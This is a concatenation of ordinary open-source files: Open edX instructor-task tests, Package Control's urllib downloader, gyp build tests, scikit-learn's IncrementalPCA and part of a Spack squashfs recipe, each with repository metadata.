from instructor_task.views import instructor_task_status, get_task_completion_info
class InstructorTaskReportTest(InstructorTaskTestCase):
"""
Tests view methods that involve the reporting of status for background tasks.
"""
def _get_instructor_task_status(self, task_id):
"""Returns status corresponding to task_id via api method."""
request = Mock()
request.REQUEST = {'task_id': task_id}
return instructor_task_status(request)
def test_instructor_task_status(self):
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
def test_missing_instructor_task_status(self):
task_id = "missing_id"
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output, {})
def test_instructor_task_status_list(self):
# Fetch status for existing tasks by arg list, as if called from ajax.
# Note that ajax does something funny with the marshalling of
# list data, so the key value has "[]" appended to it.
task_ids = [(self._create_failure_entry()).task_id for _ in range(1, 5)]
request = Mock()
request.REQUEST = MultiValueDict({'task_ids[]': task_ids})
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(len(output), len(task_ids))
for task_id in task_ids:
self.assertEquals(output[task_id]['task_id'], task_id)
def test_get_status_from_failure(self):
# get status for a task that has already failed
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], TEST_FAILURE_MESSAGE)
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': TEST_FAILURE_EXCEPTION,
'message': TEST_FAILURE_MESSAGE,
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_success(self):
# get status for a task that has already succeeded
instructor_task = self._create_success_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'total': 5,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_legacy_success(self):
# get status for a task that had already succeeded, back at a time
# when 'updated' was used instead of the preferred 'succeeded'.
legacy_progress = {
'attempted': 3,
'updated': 2,
'total': 5,
'action_name': 'rescored',
}
instructor_task = self._create_entry(task_state=SUCCESS, task_output=legacy_progress)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
self.assertEquals(output['task_progress'], legacy_progress)
def _create_email_subtask_entry(self, total=5, attempted=3, succeeded=2, skipped=0, task_state=PROGRESS):
"""Create an InstructorTask with subtask defined and email argument."""
progress = {'attempted': attempted,
'succeeded': succeeded,
'skipped': skipped,
'total': total,
'action_name': 'emailed',
}
instructor_task = self._create_entry(task_state=task_state, task_output=progress)
instructor_task.subtasks = {}
instructor_task.task_input = json.dumps({'email_id': 134})
instructor_task.save()
return instructor_task
def test_get_status_from_subtasks(self):
# get status for a task that is in progress, with updates
# from subtasks.
instructor_task = self._create_email_subtask_entry(skipped=1)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Progress: emailed 2 of 3 so far (skipping 1) (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'skipped': 1,
'total': 5,
'action_name': 'emailed',
}
self.assertEquals(output['task_progress'], expected_progress)
def _test_get_status_from_result(self, task_id, mock_result=None):
"""
Provides mock result to caller of instructor_task_status, and returns resulting output.
"""
with patch('celery.result.AsyncResult.__new__') as mock_result_ctor:
mock_result_ctor.return_value = mock_result
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
return output
def test_get_status_to_pending(self):
# get status for a task that hasn't begun to run yet
instructor_task = self._create_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PENDING
output = self._test_get_status_from_result(task_id, mock_result)
for key in ['message', 'succeeded', 'task_progress']:
self.assertTrue(key not in output)
self.assertEquals(output['task_state'], 'PENDING')
self.assertTrue(output['in_progress'])
def test_update_progress_to_progress(self):
# view task entry for task in progress
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PROGRESS
mock_result.result = {
'attempted': 5,
'succeeded': 4,
'total': 10,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Progress: rescored 4 of 5 so far (out of 10)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
self.assertEquals(output['task_progress'], mock_result.result)
def test_update_progress_to_failure(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = FAILURE
mock_result.result = NotImplementedError("This task later failed.")
mock_result.traceback = "random traceback"
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "This task later failed.")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': 'NotImplementedError',
'message': "This task later failed.",
'traceback': "random traceback",
}
self.assertEquals(output['task_progress'], expected_progress)
def test_update_progress_to_revoked(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = REVOKED
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Task revoked before running")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], REVOKED)
self.assertFalse(output['in_progress'])
expected_progress = {'message': "Task revoked before running"}
self.assertEquals(output['task_progress'], expected_progress)
def _get_output_for_task_success(self, attempted, succeeded, total, student=None):
"""returns the task_id and the result returned by instructor_task_status()."""
# view task entry for task in progress
instructor_task = self._create_progress_entry(student)
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = SUCCESS
mock_result.result = {
'attempted': attempted,
'succeeded': succeeded,
'total': total,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
return output
def _get_email_output_for_task_success(self, attempted, succeeded, total, skipped=0):
"""returns the result returned by instructor_task_status()."""
instructor_task = self._create_email_subtask_entry(
total=total,
attempted=attempted,
succeeded=succeeded,
skipped=skipped,
task_state=SUCCESS,
)
return self._test_get_status_from_result(instructor_task.task_id)
def test_update_progress_to_success(self):
output = self._get_output_for_task_success(10, 8, 10)
self.assertEquals(output['message'], "Problem rescored for 8 of 10 students")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 10,
'succeeded': 8,
'total': 10,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_success_messages(self):
output = self._get_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any students with submissions to be rescored (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Problem failed to be rescored for any of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 9 students (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Problem successfully rescored for 10 students")
self.assertTrue(output['succeeded'])
output = self._get_output_for_task_success(0, 0, 1, student=self.student)
self.assertTrue("Unable to find submission to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 0, 1, student=self.student)
self.assertTrue("Problem failed to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 1, 1, student=self.student)
self.assertTrue("Problem successfully rescored for student" in output['message'])
self.assertTrue(output['succeeded'])
def test_email_success_messages(self):
output = self._get_email_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients ")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients")
self.assertTrue(output['succeeded'])
output = self._get_email_output_for_task_success(0, 0, 10, skipped=3)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10, skipped=3)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10, skipped=3)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients (skipping 3)")
self.assertTrue(output['succeeded'])
def test_get_info_for_queuing_task(self):
# get status for a task that is still running:
instructor_task = self._create_entry()
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_missing_output(self):
# check for missing task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = None
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_broken_output(self):
# check for non-JSON task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No parsable status information available")
def test_get_info_for_empty_output(self):
# check for JSON task_output with missing keys
instructor_task = self._create_success_entry()
instructor_task.task_output = "{}"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No progress status information available")
def test_get_info_for_broken_input(self):
# check for non-JSON task_input, but then just ignore it
instructor_task = self._create_success_entry()
instructor_task.task_input = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "Status: rescored 2 of 3 (out of 5)")
|
agpl-3.0
|
dostavro/dotfiles
|
sublime2/Packages/Package Control/package_control/downloaders/urllib_downloader.py
|
9
|
11280
|
import re
import os
import sys
from .. import http
try:
# Python 3
from http.client import HTTPException, BadStatusLine
from urllib.request import ProxyHandler, HTTPPasswordMgrWithDefaultRealm, ProxyBasicAuthHandler, ProxyDigestAuthHandler, build_opener, Request
from urllib.error import HTTPError, URLError
import urllib.request as urllib_compat
except (ImportError):
# Python 2
from httplib import HTTPException, BadStatusLine
from urllib2 import ProxyHandler, HTTPPasswordMgrWithDefaultRealm, ProxyBasicAuthHandler, ProxyDigestAuthHandler, build_opener, Request
from urllib2 import HTTPError, URLError
import urllib2 as urllib_compat
try:
# Python 3.3
import ConnectionError
except (ImportError):
# Python 2.6-3.2
from socket import error as ConnectionError
from ..console_write import console_write
from ..unicode import unicode_from_os
from ..http.validating_https_handler import ValidatingHTTPSHandler
from ..http.debuggable_http_handler import DebuggableHTTPHandler
from .rate_limit_exception import RateLimitException
from .downloader_exception import DownloaderException
from .cert_provider import CertProvider
from .decoding_downloader import DecodingDownloader
from .limiting_downloader import LimitingDownloader
from .caching_downloader import CachingDownloader
class UrlLibDownloader(CertProvider, DecodingDownloader, LimitingDownloader, CachingDownloader):
"""
A downloader that uses the Python urllib module
:param settings:
A dict of the various Package Control settings. The Sublime Text
Settings API is not used because this code is run in a thread.
"""
def __init__(self, settings):
self.opener = None
self.settings = settings
def close(self):
"""
Closes any persistent/open connections
"""
if not self.opener:
return
handler = self.get_handler()
if handler:
handler.close()
self.opener = None
def download(self, url, error_message, timeout, tries, prefer_cached=False):
"""
Downloads a URL and returns the contents
Uses the proxy settings from the Package Control.sublime-settings file,
however there seem to be a decent number of proxies that this code
does not work with. Patches welcome!
:param url:
The URL to download
:param error_message:
A string to include in the console error that is printed
when an error occurs
:param timeout:
The int number of seconds to set the timeout to
:param tries:
The int number of times to try and download the URL in the case of
a timeout or HTTP 503 error
:param prefer_cached:
If a cached version should be returned instead of trying a new request
:raises:
NoCaCertException: when no CA certs can be found for the url
RateLimitException: when a rate limit is hit
DownloaderException: when any other download error occurs
:return:
The string contents of the URL
"""
if prefer_cached:
cached = self.retrieve_cached(url)
if cached:
return cached
self.setup_opener(url, timeout)
debug = self.settings.get('debug')
error_string = None
while tries > 0:
tries -= 1
try:
request_headers = {
"User-Agent": self.settings.get('user_agent'),
# Don't be alarmed if the response from the server does not
# select one of these since the server runs a relatively new
# version of OpenSSL which supports compression on the SSL
# layer, and Apache will use that instead of HTTP-level
# encoding.
"Accept-Encoding": "gzip,deflate"
}
request_headers = self.add_conditional_headers(url, request_headers)
request = Request(url, headers=request_headers)
http_file = self.opener.open(request, timeout=timeout)
self.handle_rate_limit(http_file.headers, url)
result = http_file.read()
# Make sure the response is closed so we can re-use the connection
http_file.close()
encoding = http_file.headers.get('content-encoding')
result = self.decode_response(encoding, result)
return self.cache_result('get', url, http_file.getcode(),
http_file.headers, result)
except (HTTPException) as e:
# Since we use keep-alives, it is possible the other end closed
# the connection, and we may just need to re-open
if isinstance(e, BadStatusLine):
handler = self.get_handler()
if handler and handler.use_count > 1:
self.close()
self.setup_opener(url, timeout)
tries += 1
continue
error_string = u'%s HTTP exception %s (%s) downloading %s.' % (
error_message, e.__class__.__name__, unicode_from_os(e), url)
except (HTTPError) as e:
# Make sure the response is closed so we can re-use the connection
e.read()
e.close()
# Make sure we obey Github's rate limiting headers
self.handle_rate_limit(e.headers, url)
# Handle cached responses
if unicode_from_os(e.code) == '304':
return self.cache_result('get', url, int(e.code), e.headers, b'')
# Bitbucket and Github return 503 a decent amount
if unicode_from_os(e.code) == '503' and tries != 0:
error_string = u'Downloading %s was rate limited' % url
if tries:
error_string += ', trying again'
if debug:
console_write(error_string, True)
continue
error_string = u'%s HTTP error %s downloading %s.' % (
error_message, unicode_from_os(e.code), url)
except (URLError) as e:
# Bitbucket and Github timeout a decent amount
if unicode_from_os(e.reason) == 'The read operation timed out' \
or unicode_from_os(e.reason) == 'timed out':
error_string = u'Downloading %s timed out' % url
if tries:
error_string += ', trying again'
if debug:
console_write(error_string, True)
continue
error_string = u'%s URL error %s downloading %s.' % (
error_message, unicode_from_os(e.reason), url)
except (ConnectionError):
# Handle broken pipes/reset connections by creating a new opener, and
# thus getting new handlers and a new connection
error_string = u'Connection went away while trying to download %s, trying again' % url
if debug:
console_write(error_string, True)
self.opener = None
self.setup_opener(url, timeout)
tries += 1
continue
break
raise DownloaderException(error_string)
def get_handler(self):
"""
Get the HTTPHandler object for the current connection
"""
if not self.opener:
return None
for handler in self.opener.handlers:
if isinstance(handler, ValidatingHTTPSHandler) or isinstance(handler, DebuggableHTTPHandler):
return handler
def setup_opener(self, url, timeout):
"""
Sets up a urllib OpenerDirector to be used for requests. There is a
fair amount of custom urllib code in Package Control, and part of it
is to handle proxies and keep-alives. Creating an opener the way
below is because the handlers have been customized to send the
"Connection: Keep-Alive" header and hold onto connections so they
can be re-used.
:param url:
The URL to download
:param timeout:
The int number of seconds to set the timeout to
"""
if not self.opener:
http_proxy = self.settings.get('http_proxy')
https_proxy = self.settings.get('https_proxy')
if http_proxy or https_proxy:
proxies = {}
if http_proxy:
proxies['http'] = http_proxy
if https_proxy:
proxies['https'] = https_proxy
proxy_handler = ProxyHandler(proxies)
else:
proxy_handler = ProxyHandler()
password_manager = HTTPPasswordMgrWithDefaultRealm()
proxy_username = self.settings.get('proxy_username')
proxy_password = self.settings.get('proxy_password')
if proxy_username and proxy_password:
if http_proxy:
password_manager.add_password(None, http_proxy, proxy_username,
proxy_password)
if https_proxy:
password_manager.add_password(None, https_proxy, proxy_username,
proxy_password)
handlers = [proxy_handler]
basic_auth_handler = ProxyBasicAuthHandler(password_manager)
digest_auth_handler = ProxyDigestAuthHandler(password_manager)
handlers.extend([digest_auth_handler, basic_auth_handler])
debug = self.settings.get('debug')
if debug:
console_write(u"Urllib Debug Proxy", True)
console_write(u" http_proxy: %s" % http_proxy)
console_write(u" https_proxy: %s" % https_proxy)
console_write(u" proxy_username: %s" % proxy_username)
console_write(u" proxy_password: %s" % proxy_password)
secure_url_match = re.match('^https://([^/]+)', url)
if secure_url_match != None:
secure_domain = secure_url_match.group(1)
bundle_path = self.check_certs(secure_domain, timeout)
bundle_path = bundle_path.encode(sys.getfilesystemencoding())
handlers.append(ValidatingHTTPSHandler(ca_certs=bundle_path,
debug=debug, passwd=password_manager,
user_agent=self.settings.get('user_agent')))
else:
handlers.append(DebuggableHTTPHandler(debug=debug,
passwd=password_manager))
self.opener = build_opener(*handlers)
def supports_ssl(self):
"""
Indicates if the object can handle HTTPS requests
:return:
If the object supports HTTPS requests
"""
return 'ssl' in sys.modules and hasattr(urllib_compat, 'HTTPSHandler')
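# Illustrative usage sketch (not part of the original module; the settings
# values and URL are assumptions):
#
#     settings = {'debug': False, 'user_agent': 'Package Control', 'timeout': 30}
#     downloader = UrlLibDownloader(settings)
#     try:
#         content = downloader.download('https://example.com/channel.json',
#                                       'Error downloading channel.', 30, 3)
#     finally:
#         downloader.close()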
|
mit
|
overra/node-gyp
|
gyp/test/include_dirs/gyptest-default.py
|
102
|
1073
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies use of include_dirs when using the default build target.
"""
import TestGyp
test = TestGyp.TestGyp()
if test.format == 'scons':
test.skip_test('TODO: http://code.google.com/p/gyp/issues/detail?id=176\n')
test.run_gyp('includes.gyp', chdir='src')
test.relocate('src', 'relocate/src')
test.build('includes.gyp', test.ALL, chdir='relocate/src')
expect = """\
Hello from includes.c
Hello from inc.h
Hello from include1.h
Hello from subdir/inc2/include2.h
Hello from shadow2/shadow.h
"""
test.run_built_executable('includes', stdout=expect, chdir='relocate/src')
if test.format == 'xcode':
chdir='relocate/src/subdir'
else:
chdir='relocate/src'
expect = """\
Hello from subdir/subdir_includes.c
Hello from subdir/inc.h
Hello from include1.h
Hello from subdir/inc2/include2.h
"""
test.run_built_executable('subdir_includes', stdout=expect, chdir=chdir)
test.pass_test()
|
mit
|
MKV21/glimpse_client
|
3rdparty/breakpad/src/tools/gyp/test/generator-output/gyptest-copies.py
|
74
|
1802
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies file copies with --generator-output using an explicit build
target of 'all'.
"""
import TestGyp
# Ninja and Android don't support --generator-output.
test = TestGyp.TestGyp(formats=['!ninja', '!android'])
test.writable(test.workpath('copies'), False)
test.run_gyp('copies.gyp',
'--generator-output=' + test.workpath('gypfiles'),
chdir='copies')
test.writable(test.workpath('copies'), True)
test.relocate('copies', 'relocate/copies')
test.relocate('gypfiles', 'relocate/gypfiles')
test.writable(test.workpath('relocate/copies'), False)
test.writable(test.workpath('relocate/copies/build'), True)
test.writable(test.workpath('relocate/copies/copies-out'), True)
test.writable(test.workpath('relocate/copies/subdir/build'), True)
test.writable(test.workpath('relocate/copies/subdir/copies-out'), True)
test.build('copies.gyp', test.ALL, chdir='relocate/gypfiles')
test.must_match(['relocate', 'copies', 'copies-out', 'file1'],
"file1 contents\n")
if test.format == 'xcode':
chdir = 'relocate/copies/build'
elif test.format == 'make':
chdir = 'relocate/gypfiles/out'
else:
chdir = 'relocate/gypfiles'
test.must_match([chdir, 'Default', 'copies-out', 'file2'], "file2 contents\n")
test.must_match(['relocate', 'copies', 'subdir', 'copies-out', 'file3'],
"file3 contents\n")
if test.format == 'xcode':
chdir = 'relocate/copies/subdir/build'
elif test.format == 'make':
chdir = 'relocate/gypfiles/out'
else:
chdir = 'relocate/gypfiles'
test.must_match([chdir, 'Default', 'copies-out', 'file4'], "file4 contents\n")
test.pass_test()
|
bsd-3-clause
|
spallavolu/scikit-learn
|
sklearn/decomposition/incremental_pca.py
|
199
|
10508
|
"""Incremental Principal Components Analysis."""
# Author: Kyle Kastner <[email protected]>
# License: BSD 3 clause
import numpy as np
from scipy import linalg
from .base import _BasePCA
from ..utils import check_array, gen_batches
from ..utils.extmath import svd_flip, _batch_mean_variance_update
class IncrementalPCA(_BasePCA):
"""Incremental principal components analysis (IPCA).
Linear dimensionality reduction using Singular Value Decomposition of
centered data, keeping only the most significant singular vectors to
project the data to a lower dimensional space.
Depending on the size of the input data, this algorithm can be much more
memory efficient than a PCA.
This algorithm has constant memory complexity, on the order
of ``batch_size``, enabling use of np.memmap files without loading the
entire file into memory.
The computational overhead of each SVD is
``O(batch_size * n_features ** 2)``, but only 2 * batch_size samples
remain in memory at a time. There will be ``n_samples / batch_size`` SVD
computations to get the principal components, versus 1 large SVD of
complexity ``O(n_samples * n_features ** 2)`` for PCA.
Read more in the :ref:`User Guide <IncrementalPCA>`.
Parameters
----------
n_components : int or None, (default=None)
Number of components to keep. If ``n_components`` is ``None``,
then ``n_components`` is set to ``min(n_samples, n_features)``.
batch_size : int or None, (default=None)
The number of samples to use for each batch. Only used when calling
``fit``. If ``batch_size`` is ``None``, then ``batch_size``
is inferred from the data and set to ``5 * n_features``, to provide a
balance between approximation accuracy and memory consumption.
copy : bool, (default=True)
If False, X will be overwritten. ``copy=False`` can be used to
save memory but is unsafe for general use.
whiten : bool, optional
When True (False by default) the ``components_`` vectors are divided
by ``n_samples`` times ``components_`` to ensure uncorrelated outputs
with unit component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometimes
improve the predictive accuracy of the downstream estimators by
making data respect some hard-wired assumptions.
Attributes
----------
components_ : array, shape (n_components, n_features)
Components with maximum variance.
explained_variance_ : array, shape (n_components,)
Variance explained by each of the selected components.
explained_variance_ratio_ : array, shape (n_components,)
Percentage of variance explained by each of the selected components.
If all components are stored, the sum of explained variances is equal
to 1.0
mean_ : array, shape (n_features,)
Per-feature empirical mean, aggregate over calls to ``partial_fit``.
var_ : array, shape (n_features,)
Per-feature empirical variance, aggregate over calls to ``partial_fit``.
noise_variance_ : float
The estimated noise covariance following the Probabilistic PCA model
from Tipping and Bishop 1999. See "Pattern Recognition and
Machine Learning" by C. Bishop, 12.2.1 p. 574 or
http://www.miketipping.com/papers/met-mppca.pdf.
n_components_ : int
The estimated number of components. Relevant when ``n_components=None``.
n_samples_seen_ : int
The number of samples processed by the estimator. Will be reset on
new calls to fit, but increments across ``partial_fit`` calls.
Notes
-----
Implements the incremental PCA model from:
`D. Ross, J. Lim, R. Lin, M. Yang, Incremental Learning for Robust Visual
Tracking, International Journal of Computer Vision, Volume 77, Issue 1-3,
pp. 125-141, May 2008.`
See http://www.cs.toronto.edu/~dross/ivt/RossLimLinYang_ijcv.pdf
This model is an extension of the Sequential Karhunen-Loeve Transform from:
`A. Levy and M. Lindenbaum, Sequential Karhunen-Loeve Basis Extraction and
its Application to Images, IEEE Transactions on Image Processing, Volume 9,
Number 8, pp. 1371-1374, August 2000.`
See http://www.cs.technion.ac.il/~mic/doc/skl-ip.pdf
We have specifically abstained from an optimization used by authors of both
papers, a QR decomposition used in specific situations to reduce the
algorithmic complexity of the SVD. The source for this technique is
`Matrix Computations, Third Edition, G. Golub and C. Van Loan, Chapter 5,
section 5.4.4, pp 252-253.`. This technique has been omitted because it is
advantageous only when decomposing a matrix with ``n_samples`` (rows)
>= 5/3 * ``n_features`` (columns), and hurts the readability of the
implemented algorithm. This would be a good opportunity for future
optimization, if it is deemed necessary.
References
----------
D. Ross, J. Lim, R. Lin, M. Yang. Incremental Learning for Robust Visual
Tracking, International Journal of Computer Vision, Volume 77,
Issue 1-3, pp. 125-141, May 2008.
G. Golub and C. Van Loan. Matrix Computations, Third Edition, Chapter 5,
Section 5.4.4, pp. 252-253.
See also
--------
PCA
RandomizedPCA
KernelPCA
SparsePCA
TruncatedSVD
"""
def __init__(self, n_components=None, whiten=False, copy=True,
batch_size=None):
self.n_components = n_components
self.whiten = whiten
self.copy = copy
self.batch_size = batch_size
def fit(self, X, y=None):
"""Fit the model with X, using minibatches of size batch_size.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples and
n_features is the number of features.
y: Passthrough for ``Pipeline`` compatibility.
Returns
-------
self: object
Returns the instance itself.
"""
self.components_ = None
self.mean_ = None
self.singular_values_ = None
self.explained_variance_ = None
self.explained_variance_ratio_ = None
self.noise_variance_ = None
self.var_ = None
self.n_samples_seen_ = 0
X = check_array(X, dtype=np.float)
n_samples, n_features = X.shape
if self.batch_size is None:
self.batch_size_ = 5 * n_features
else:
self.batch_size_ = self.batch_size
for batch in gen_batches(n_samples, self.batch_size_):
self.partial_fit(X[batch])
return self
def partial_fit(self, X, y=None):
"""Incremental fit with X. All of X is processed as a single batch.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
self: object
Returns the instance itself.
"""
X = check_array(X, copy=self.copy, dtype=np.float)
n_samples, n_features = X.shape
if not hasattr(self, 'components_'):
self.components_ = None
if self.n_components is None:
self.n_components_ = n_features
elif not 1 <= self.n_components <= n_features:
raise ValueError("n_components=%r invalid for n_features=%d, need "
"more rows than columns for IncrementalPCA "
"processing" % (self.n_components, n_features))
else:
self.n_components_ = self.n_components
if (self.components_ is not None) and (self.components_.shape[0]
!= self.n_components_):
raise ValueError("Number of input features has changed from %i "
"to %i between calls to partial_fit! Try "
"setting n_components to a fixed value." % (
self.components_.shape[0], self.n_components_))
if self.components_ is None:
# This is the first pass through partial_fit
self.n_samples_seen_ = 0
col_var = X.var(axis=0)
col_mean = X.mean(axis=0)
X -= col_mean
U, S, V = linalg.svd(X, full_matrices=False)
U, V = svd_flip(U, V, u_based_decision=False)
explained_variance = S ** 2 / n_samples
explained_variance_ratio = S ** 2 / np.sum(col_var *
n_samples)
else:
col_batch_mean = X.mean(axis=0)
col_mean, col_var, n_total_samples = _batch_mean_variance_update(
X, self.mean_, self.var_, self.n_samples_seen_)
X -= col_batch_mean
# Build matrix of combined previous basis and new data
mean_correction = np.sqrt((self.n_samples_seen_ * n_samples) /
n_total_samples) * (self.mean_ -
col_batch_mean)
X_combined = np.vstack((self.singular_values_.reshape((-1, 1)) *
self.components_, X,
mean_correction))
U, S, V = linalg.svd(X_combined, full_matrices=False)
U, V = svd_flip(U, V, u_based_decision=False)
explained_variance = S ** 2 / n_total_samples
explained_variance_ratio = S ** 2 / np.sum(col_var *
n_total_samples)
self.n_samples_seen_ += n_samples
self.components_ = V[:self.n_components_]
self.singular_values_ = S[:self.n_components_]
self.mean_ = col_mean
self.var_ = col_var
self.explained_variance_ = explained_variance[:self.n_components_]
self.explained_variance_ratio_ = \
explained_variance_ratio[:self.n_components_]
if self.n_components_ < n_features:
self.noise_variance_ = \
explained_variance[self.n_components_:].mean()
else:
self.noise_variance_ = 0.
return self
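# Illustrative usage sketch (not part of the original module):
#
#     import numpy as np
#     from sklearn.decomposition import IncrementalPCA
#
#     X = np.random.RandomState(0).rand(1000, 20)
#     ipca = IncrementalPCA(n_components=5, batch_size=100)
#     ipca.fit(X)                    # streams X through partial_fit in batches
#     X_reduced = ipca.transform(X)  # shape (1000, 5), via _BasePCA.transform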
|
bsd-3-clause
|
iulian787/spack
|
var/spack/repos/builtin/packages/squashfs/package.py
|
3
|
3214
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Squashfs(MakefilePackage):
"""Squashfs - read only compressed filesystem"""
homepage = 'http://squashfs.sourceforge.net'
url = 'https://downloads.sourceforge.net/project/squashfs/squashfs/squashfs4.3/squashfs4.3.tar.gz'
# version sha256
version('4.4', sha256='a981b3f3f2054b5a2e658851a3c06a2460ad04a9a8a645e0afe063a63fdbb07e')
version('4.3', sha256='0d605512437b1eb800b4736791559295ee5f60177e102e4d4ccd0ee241a5f3f6')
version('4.2', sha256='d9e0195aa922dbb665ed322b9aaa96e04a476ee650f39bbeadb0d00b24022e96')
version('4.1', sha256='3a870d065a25b3f5467bc6d9ed34340befab51a3f9e4b7e3792ea0ff4e06046a')
version('4.0', sha256='18948edbe06bac2c4307eea99bfb962643e4b82e5b7edd541b4d743748e12e21')
